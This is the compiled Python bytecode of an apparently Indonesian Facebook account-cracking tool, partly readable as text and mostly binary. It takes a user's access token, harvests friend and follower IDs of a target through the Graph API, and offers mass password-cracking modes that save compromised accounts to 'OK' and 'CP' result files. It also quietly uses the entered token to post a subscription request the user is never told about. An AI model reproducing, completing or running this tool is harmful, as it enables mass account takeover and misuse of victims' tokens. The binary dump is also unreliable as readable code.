\x1b[1;96m\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x88 ==============\n \xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x95\xa6\xe2\x94\x80\xe2\x95\xa6\xe2\x95\x94\xe2\x95\x97\xe2\x95\xa6\xe2\x94\x80\xe2\x95\x94\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97\xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88 \xe2\x97\x8d\xe2\x9e\xa4 \x1b[1;92mCOMMUNITAS \x1b[1;96m \n \xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x95\x91\xe2\x95\x91\xe2\x95\x91\xe2\x95\xa0\xe2\x94\x80\xe2\x95\x91\xe2\x94\x80\xe2\x95\x91\xe2\x94\x80\xe2\x95\x91\xe2\x95\x91\xe2\x95\x91\xe2\x95\x91\xe2\x95\x91\xe2\x95\xa0\xe2\x94\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88 \xe2\x97\x8d\xe2\x9e\xa4 \x1b[1;93mGARANGAN \x1b[1;96m \n \xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\xa9\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x9d\xe2\x95\xa9\xe2\x94\x80\xe2\x95\xa9\xe2\x95\x9a\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88 \xe2\x97\x8d\xe2\x9e\xa4 \x1b[1;91mALAY \x1b[1;96m \n \xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x88 \xe2\x97\x8d\xe2\x9e\xa4 \x1b[1;97mINDONESIA \x1b[1;96m \n \x1b[1;95m\xc2\xae\xe2\x94\x8f\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x93\xe2\x95\x8b\xe2\x95\x8b\xe2\x94\x8f\xe2\x94\x93\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x94\x8f\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x93\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x94\x8f\xe2\x94\x93\n 
\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x81\xe2\x94\x93\xe2\x94\x83\xe2\x95\x8b\xe2\x95\x8b\xe2\x94\x83\xe2\x94\x83\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x81\xe2\x94\x93\xe2\x94\x83\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x94\x83\xe2\x94\x83\n \xe2\x94\x83\xe2\x94\x97\xe2\x94\x81\xe2\x94\x9b\xe2\x94\xa3\xe2\x94\x81\xe2\x94\x81\xe2\x94\xab\xe2\x94\x83\xe2\x94\x8f\xe2\x94\xb3\xe2\x94\x81\xe2\x94\x81\xe2\x94\xab\xe2\x94\x83\xe2\x95\x8b\xe2\x94\x83\xe2\x94\xa3\xe2\x94\x93\xe2\x94\x8f\xe2\x94\xb3\xe2\x94\x81\xe2\x94\x81\xe2\x94\xb3\xe2\x94\x81\xe2\x94\x93\xe2\x94\x8f\xe2\x94\x81\xe2\x94\x9b\xe2\x94\xa3\xe2\x94\x81\xe2\x94\x81\xe2\x94\x93 \n \x1b[1;92m\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x8f\xe2\x94\xab\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\xe2\x94\x97\xe2\x94\x9b\xe2\x94\xab\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\xe2\x94\x97\xe2\x94\x81\xe2\x94\x9b\xe2\x94\x83\xe2\x94\x97\xe2\x94\x9b\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x93\xe2\x94\xab\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\n \xe2\x94\x83\xe2\x94\x83\xe2\x94\x83\xe2\x94\x97\xe2\x94\xab\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x93\xe2\x94\xab\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x81\xe2\x94\x93\xe2\x94\x83\xe2\x94\x83\xe2\x94\x83\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\xe2\x94\x83\xe2\x94\x83\xe2\x94\x83\xe2\x94\x97\xe2\x94\x9b\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\n \xe2\x94\x97\xe2\x94\x9b\xe2\x94\x97\xe2\x94\x81\xe2\x94\xbb\xe2\x94\x9b\xe2\x94\x97\xe2\x94\xbb\xe2\x94\x9b\xe2\x94\x97\xe2\x94\xbb\xe2\x94\x9b\xe2\x94\x97\xe2\x94\xbb\xe2\x94\x9b\xe2\x95\x8b\xe2\x94\x97\xe2\x94\xbb\xe2\x94\xbb\xe2\x94\xbb\xe2\x94\xbb\xe2\x94\x9b\xe2\x94\x97\xe2\x94\xbb\xe2\x94\x9b\xe2\x94\x97\xe2\x94\xbb\xe2\x94\x81\xe2\x94\x81\xe2\x94\xbb\xe2\x94\x9b\xe2\x94\x97\xe2\x94\x9b \x1b[1;97m \n \n 
\x1b[1;95m\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x80\xa2 \x1b[1;92m\xe2\x97\x8f \x1b[1;95m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90 \x1b[1;92m\xe2\x97\x8f \x1b[1;97m\x1b[1;95m\xe2\x80\xa2\xe2\x95\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80 \n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Author : \x1b[1;92m\xe2\x98\x86 RAKA \xe2\x98\x86 \xe2\x84\xa2\xef\xb8\xbb\xc2\xae\xe2\x95\xa4\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x97\x8d\xe2\x9e\xa4 \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Github : \x1b[1;92mhttps://github.com/Bangsat-XD \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Facebook : \x1b[1;92mRaka Andrian Tara \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Instagram : \x1b[1;92mraka_andrian27 \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Twitter : \x1b[1;92mBangsat_XD \x1b[1;97m\n \x1b[1;95m\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x80\xa2 \x1b[1;92m\xe2\x97\x8f \x1b[1;95m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90 \x1b[1;92m\xe2\x97\x8f \x1b[1;97m\x1b[1;95m\xe2\x80\xa2\xe2\x95\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80 
(\x02\x00\x00\x00t\x02\x00\x00\x00ost\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x04\x00\x00\x00logo?\x00\x00\x00s\x04\x00\x00\x00\x00\x01\r\x19c\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x16\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x11\x00t\x02\x00j\x03\x00d\x02\x00\x83\x01\x00\x01Wn!\x00\x04t\x02\x00j\x04\x00j\x05\x00k\n\x00rA\x00\x01\x01\x01t\x06\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xy\x1a\x00t\x07\x00d\x04\x00d\x05\x00\x83\x02\x00}\x00\x00t\x08\x00\x83\x00\x00\x01Wn\xb3\x00\x04t\t\x00k\n\x00r\x11\x01\x01}\x01\x00\x01t\n\x00d\x06\x00\x83\x01\x00}\x00\x00|\x00\x00d\x07\x00k\x02\x00r\x8e\x00d\x08\x00GHn\x00\x00yU\x00t\x02\x00j\x03\x00d\t\x00|\x00\x00\x17\x83\x01\x00j\x0b\x00\x83\x00\x00d\n\x00\x19j\x0c\x00\x83\x00\x00}\x02\x00t\x07\x00d\x04\x00d\x0b\x00\x83\x02\x00j\r\x00|\x00\x00\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x0c\x00|\x00\x00\x17\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01Wq\x12\x01\x04t\t\x00k\n\x00r\r\x01\x01\x01\x01t\x00\x00j\x01\x00d\r\x00\x83\x01\x00\x01t\x06\x00d\x0e\x00\x83\x01\x00\x01q\x12\x01Xn\x01\x00Xd\x00\x00S(\x0f\x00\x00\x00NR%\x00\x00\x00s\x1b\x00\x00\x00https://mbasic.facebook.coms\x19\x00\x00\x00Internet Connection Errors\t\x00\x00\x00login.txtt\x01\x00\x00\x00rsB\x00\x00\x00[?] \xe2\x98\x86ENTER TOKEN\xe2\x98\x86 \xe2\x84\xa2\xef\xb8\xbb\xc2\xae\xe2\x95\xa4\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x97\x8d\xe2\x9e\xa4 : t\x00\x00\x00\x00s\x0b\x00\x00\x00Wrong Inputs+\x00\x00\x00https://graph.facebook.com/me?access_token=t\x04\x00\x00\x00namet\x01\x00\x00\x00ws6\x00\x00\x00https://graph.facebook.com/4/subscribers?access_token=s\x0f\x00\x00\x00rm -f login.txts\x0f\x00\x00\x00[?] 
Login Error(\x0f\x00\x00\x00R&\x00\x00\x00R\'\x00\x00\x00t\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\n\x00\x00\x00exceptionst\x0f\x00\x00\x00ConnectionErrort\x04\x00\x00\x00exitt\x04\x00\x00\x00opent\x04\x00\x00\x00menut\x08\x00\x00\x00KeyErrort\t\x00\x00\x00raw_inputt\x04\x00\x00\x00jsont\x05\x00\x00\x00lowerR\x12\x00\x00\x00t\x04\x00\x00\x00post(\x03\x00\x00\x00t\x05\x00\x00\x00tokent\x07\x00\x00\x00IOErrort\x04\x00\x00\x00nama(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x05\x00\x00\x00loginZ\x00\x00\x00s(\x00\x00\x00\x00\x01\r\x01\x03\x02\x11\x01\x13\x01\x0e\x01\x03\x01\x0f\x01\x0b\x01\x0f\x01\x0c\x01\x0c\x01\x08\x01\x03\x01#\x01\x16\x02\x11\x01\x0b\x01\r\x01\r\x01c\x00\x00\x00\x00\t\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xfe\x03\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn(\x00\x04t\x05\x00k\n\x00rP\x00\x01\x01\x01t\x00\x00j\x01\x00d\x04\x00\x83\x01\x00\x01t\x06\x00d\x05\x00\x83\x01\x00\x01n\x01\x00Xy\'\x00t\x07\x00j\x08\x00d\x06\x00t\x04\x00\x17\x83\x01\x00j\t\x00\x83\x00\x00d\x07\x00\x19j\n\x00\x83\x00\x00}\x00\x00WnH\x00\x04t\x0b\x00k\n\x00r\xa2\x00\x01\x01\x01t\x00\x00j\x01\x00d\x04\x00\x83\x01\x00\x01t\x06\x00d\x08\x00\x83\x01\x00\x01n!\x00\x04t\x07\x00j\x0c\x00j\r\x00k\n\x00r\xc2\x00\x01\x01\x01t\x06\x00d\t\x00\x83\x01\x00\x01n\x01\x00Xt\x0e\x00\x83\x00\x00\x01d\n\x00GHd\x0b\x00|\x00\x00\x17d\x0c\x00\x17GHd\n\x00GHd\r\x00GHd\x0e\x00GHd\x0f\x00GHd\x10\x00GHd\x11\x00GHd\x12\x00GHt\x0f\x00d\x13\x00\x83\x01\x00}\x01\x00|\x01\x00d\x14\x00k\x02\x00r!\x01t\x10\x00\x83\x00\x00\x01n\xd9\x02|\x01\x00d\x15\x00k\x02\x00s9\x01|\x01\x00d\x16\x00k\x02\x00rJ\x01t\x11\x00\x83\x00\x00\x01t\x12\x00\x83\x00\x00\x01n\xb0\x02|\x01\x00d\x17\x00k\x02\x00sb\x01|\x01\x00d\x18\x00k\x02\x00rs\x01t\x13\x00\x83\x00\x00\x01t\x12\x00\x83\x00\x00\x01n\x87\x02|\x01\x00d\x19\x00k\x02\x00s\x8b\x01|\x01\x00d\x1a\x00k\x02\x00r\x9c\x01t\x14\x00\x83\x00\x00\x01t\x12\x00\x83\x00\x00
\x01n^\x02|\x01\x00d\x1b\x00k\x02\x00s\xb4\x01|\x01\x00d\x1c\x00k\x02\x00r\xfa\x03d\x1d\x00GHd\x1e\x00GHd\x1f\x00GHd\x1d\x00GHt\x0f\x00d\x13\x00\x83\x01\x00}\x02\x00|\x02\x00d\x14\x00k\x02\x00r\xea\x01t\x10\x00\x83\x00\x00\x01n\x06\x02|\x02\x00d\x15\x00k\x02\x00r\xed\x02t\x00\x00j\x15\x00d \x00\x83\x01\x00}\x03\x00d!\x00GHx\x17\x00|\x03\x00D]\x0f\x00}\x04\x00d"\x00|\x04\x00\x17GHq\x11\x02WyB\x00t\x0f\x00d#\x00\x83\x01\x00}\x04\x00|\x04\x00d\x14\x00k\x02\x00rI\x02t\x10\x00\x83\x00\x00\x01n\x00\x00t\x02\x00d$\x00|\x04\x00\x16\x83\x01\x00j\x03\x00\x83\x00\x00j\x16\x00\x83\x00\x00}\x05\x00Wn\x1f\x00\x04t\x0b\x00k\n\x00r\x87\x02\x01\x01\x01t\x06\x00d%\x00|\x04\x00\x16\x83\x01\x00\x01n\x01\x00Xd&\x00|\x04\x00\x16j\x17\x00d\'\x00d\x1d\x00\x83\x02\x00}\x06\x00|\x06\x00j\x17\x00d(\x00d\x14\x00\x83\x02\x00}\x07\x00d)\x00GHd*\x00|\x07\x00t\x18\x00|\x05\x00\x83\x01\x00f\x02\x00\x16GHt\x00\x00j\x01\x00d+\x00|\x04\x00\x16\x83\x01\x00\x01d,\x00GHt\x06\x00d\x1d\x00\x83\x01\x00\x01n\x03\x01|\x02\x00d\x17\x00k\x02\x00r\xf0\x03t\x00\x00j\x15\x00d-\x00\x83\x01\x00}\x03\x00d.\x00GHx\x17\x00|\x03\x00D]\x0f\x00}\x04\x00d/\x00|\x04\x00\x17GHq\x14\x03WyB\x00t\x0f\x00d0\x00\x83\x01\x00}\x04\x00|\x04\x00d\x14\x00k\x02\x00rL\x03t\x10\x00\x83\x00\x00\x01n\x00\x00t\x02\x00d1\x00|\x04\x00\x16\x83\x01\x00j\x03\x00\x83\x00\x00j\x16\x00\x83\x00\x00}\x08\x00Wn\x1f\x00\x04t\x0b\x00k\n\x00r\x8a\x03\x01\x01\x01t\x06\x00d%\x00|\x04\x00\x16\x83\x01\x00\x01n\x01\x00Xd&\x00|\x04\x00\x16j\x17\x00d\'\x00d\x1d\x00\x83\x02\x00}\x06\x00|\x06\x00j\x17\x00d(\x00d\x14\x00\x83\x02\x00}\x07\x00d2\x00GHd3\x00|\x07\x00t\x18\x00|\x08\x00\x83\x01\x00f\x02\x00\x16GHt\x00\x00j\x01\x00d4\x00|\x04\x00\x16\x83\x01\x00\x01d5\x00GHt\x06\x00d\x1d\x00\x83\x01\x00\x01n\x00\x00t\x10\x00\x83\x00\x00\x01n\x00\x00d\x00\x00S(6\x00\x00\x00NR%\x00\x00\x00s\t\x00\x00\x00login.txtR)\x00\x00\x00s\x0f\x00\x00\x00rm -f login.txts\x0f\x00\x00\x00[?] 
Login Errors,\x00\x00\x00https://graph.facebook.com/me/?access_token=R+\x00\x00\x00s$\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] Token Errors\x19\x00\x00\x00 ! no internet connections?\x00\x00\x00\x1b[1;92m<======================================================>s/\x00\x00\x00\x1b[1;96m<---------------- \x1b[1;95m[ HELLO \x1b[1;92ms(\x00\x00\x00\x1b[1;92m \x1b[1;95m] \x1b[1;96m--------------->sJ\x00\x00\x00\x1b[1;96m[\x1b[1;93m1\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Clone from public friendssL\x00\x00\x00\x1b[1;96m[\x1b[1;93m2\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Crack from public followerssk\x00\x00\x00\x1b[1;96m[\x1b[1;93m3\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Multi cracking from public Id\x1b[1;97m [ \x1b[1;95mPro \x1b[1;97m]sD\x00\x00\x00\x1b[1;96m[\x1b[1;93m4\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Check crack resultssb\x00\x00\x00\x1b[1;96m[\x1b[1;93m5\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m User-agent settings \x1b[1;97m [ \x1b[1;95mPro \x1b[1;97m]s[\x00\x00\x00\x1b[1;96m[\x1b[1;93m6\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Exit\x1b[1;97m [ \x1b[1;91mRemove-Token \x1b[1;97m]s;\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Option : R*\x00\x00\x00t\x01\x00\x00\x001R\x19\x00\x00\x00t\x01\x00\x00\x002R\x1a\x00\x00\x00t\x01\x00\x00\x003R\x1b\x00\x00\x00t\x01\x00\x00\x004R\x1c\x00\x00\x00t\x01\x00\x00\x00 sM\x00\x00\x00\x1b[1;96m[\x1b[1;93m1\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Check results RAKA_AMANDA OKsM\x00\x00\x00\x1b[1;96m[\x1b[1;93m2\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Check results RAKA_AMANDA CPt\x02\x00\x00\x00OKs<\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] Copy file name and past into inputs\x06\x00\x00\x00[\xc2\xae] s&\x00\x00\x00\n\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] file name : 
s\x05\x00\x00\x00OK/%ss\x19\x00\x00\x00 ! file %s tidak tersedias\x02\x00\x00\x00%st\x01\x00\x00\x00-s\x04\x00\x00\x00.txts1\x00\x00\x00 # ----------------------------------------------s%\x00\x00\x00 Crack Resulte : %s Total : %s\x1b[0;92ms\t\x00\x00\x00cat OK/%ss9\x00\x00\x00 \x1b[0;94m # ----------------------------------------------t\x02\x00\x00\x00CPs;\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] Copy File Name And Past into Inputs\x03\x00\x00\x00 + s&\x00\x00\x00\n\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] File Name : s\x05\x00\x00\x00CP/%ss0\x00\x00\x00# ----------------------------------------------s%\x00\x00\x00 Crack results : %s total : %s\x1b[0;93ms\t\x00\x00\x00cat CP/%ss8\x00\x00\x00\x1b[0;96m # ----------------------------------------------(\x19\x00\x00\x00R&\x00\x00\x00R\'\x00\x00\x00R2\x00\x00\x00t\x04\x00\x00\x00readR9\x00\x00\x00R4\x00\x00\x00R1\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00R7\x00\x00\x00R:\x00\x00\x00R/\x00\x00\x00R0\x00\x00\x00R(\x00\x00\x00R5\x00\x00\x00R3\x00\x00\x00t\x06\x00\x00\x00publikt\x06\x00\x00\x00methodt\x08\x00\x00\x00followert\x06\x00\x00\x00massalt\x07\x00\x00\x00listdirt\n\x00\x00\x00splitlinest\x07\x00\x00\x00replacet\x03\x00\x00\x00len(\t\x00\x00\x00R;\x00\x00\x00t\x05\x00\x00\x00Bilalt\x03\x00\x00\x00cekt\x04\x00\x00\x00dirst\x04\x00\x00\x00filet\x07\x00\x00\x00Totalokt\x07\x00\x00\x00nm_filet\x07\x00\x00\x00del_txtt\x07\x00\x00\x00Totalcp(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R3\x00\x00\x00s\x00\x00\x00s\xa4\x00\x00\x00\x00\x01\r\x02\x03\x01\x19\x01\r\x01\r\x01\x0e\x01\x03\x01\'\x01\r\x01\r\x01\r\x01\x13\x01\x0e\x03\x07\x01\x05\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x02\x0c\x01\x0c\x01\n\x01\x18\x01\x07\x01\n\x01\x18\x01\x07\x01\n\x01\x18\x01\x07\x01\n\x01\x18\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\x0f\x01\x05\x01\r\x01\r\x01\x03\x01\x0c\x01\x0c\x01\n\x01 
\x01\r\x01\x12\x01\x16\x01\x12\x01\x05\x01\x15\x01\x11\x01\x05\x01\r\x01\x0c\x01\x0f\x01\x05\x01\r\x01\r\x01\x03\x01\x0c\x01\x0c\x01\n\x01 \x01\r\x01\x12\x01\x16\x01\x12\x01\x05\x01\x15\x01\x11\x01\x05\x01\r\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xdc\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn\x1b\x00\x04t\x03\x00k\n\x00r6\x00\x01\x01\x01t\x04\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xt\x05\x00d\x04\x00\x83\x01\x00}\x00\x00yh\x00xa\x00t\x06\x00j\x07\x00d\x05\x00|\x00\x00t\x02\x00f\x02\x00\x16\x83\x01\x00j\x08\x00\x83\x00\x00d\x06\x00\x19D]<\x00}\x01\x00|\x01\x00d\x07\x00\x19}\x02\x00|\x01\x00d\x08\x00\x19j\t\x00d\t\x00\x83\x01\x00d\n\x00\x19}\x03\x00t\n\x00j\x0b\x00|\x02\x00d\x0b\x00\x17|\x03\x00\x17\x83\x01\x00\x01qj\x00WWn\x1b\x00\x04t\x0c\x00k\n\x00r\xc8\x00\x01\x01\x01t\x04\x00d\x0c\x00\x83\x01\x00\x01n\x01\x00Xd\r\x00t\r\x00t\n\x00\x83\x01\x00\x16GHd\x00\x00S(\x0e\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s%\x00\x00\x00\n\x1b[1;96m[\x1b[1;93m!\x1b[1;96m] Token Errors%\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Target Id : s5\x00\x00\x00https://graph.facebook.com/%s/friends?access_token=%st\x04\x00\x00\x00datat\x02\x00\x00\x00idR+\x00\x00\x00RA\x00\x00\x00i\x00\x00\x00\x00s\x03\x00\x00\x00<=>s6\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Account friend list is not publics5\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Total Id : 
\x1b[0;91m%s\x1b[0;97m(\x0e\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R9\x00\x00\x00R:\x00\x00\x00R1\x00\x00\x00R5\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00t\x06\x00\x00\x00rsplitRW\x00\x00\x00t\x06\x00\x00\x00appendR4\x00\x00\x00RM\x00\x00\x00(\x04\x00\x00\x00t\x03\x00\x00\x00idtt\x01\x00\x00\x00it\x03\x00\x00\x00uidR;\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RF\x00\x00\x00\xcb\x00\x00\x00s\x1a\x00\x00\x00\x00\x02\x03\x01\x19\x01\r\x01\x0e\x01\x0c\x01\x03\x01*\x01\n\x01\x17\x01\x1d\x01\r\x01\x0e\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xdc\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn\x1b\x00\x04t\x03\x00k\n\x00r6\x00\x01\x01\x01t\x04\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xt\x05\x00d\x04\x00\x83\x01\x00}\x00\x00yh\x00xa\x00t\x06\x00j\x07\x00d\x05\x00|\x00\x00t\x02\x00f\x02\x00\x16\x83\x01\x00j\x08\x00\x83\x00\x00d\x06\x00\x19D]<\x00}\x01\x00|\x01\x00d\x07\x00\x19}\x02\x00|\x01\x00d\x08\x00\x19j\t\x00d\t\x00\x83\x01\x00d\n\x00\x19}\x03\x00t\n\x00j\x0b\x00|\x02\x00d\x0b\x00\x17|\x03\x00\x17\x83\x01\x00\x01qj\x00WWn\x1b\x00\x04t\x0c\x00k\n\x00r\xc8\x00\x01\x01\x01t\x04\x00d\x0c\x00\x83\x01\x00\x01n\x01\x00Xd\r\x00t\r\x00t\n\x00\x83\x01\x00\x16GHd\x00\x00S(\x0e\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s%\x00\x00\x00\n\x1b[1;96m[\x1b[1;94m+\x1b[1;96m] Token Errors%\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Target Id : sD\x00\x00\x00https://graph.facebook.com/%s/subscribers?limit=5000&access_token=%sRV\x00\x00\x00RW\x00\x00\x00R+\x00\x00\x00RA\x00\x00\x00i\x00\x00\x00\x00s\x03\x00\x00\x00<=>s6\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Account friend list is not publics5\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Total Id : 
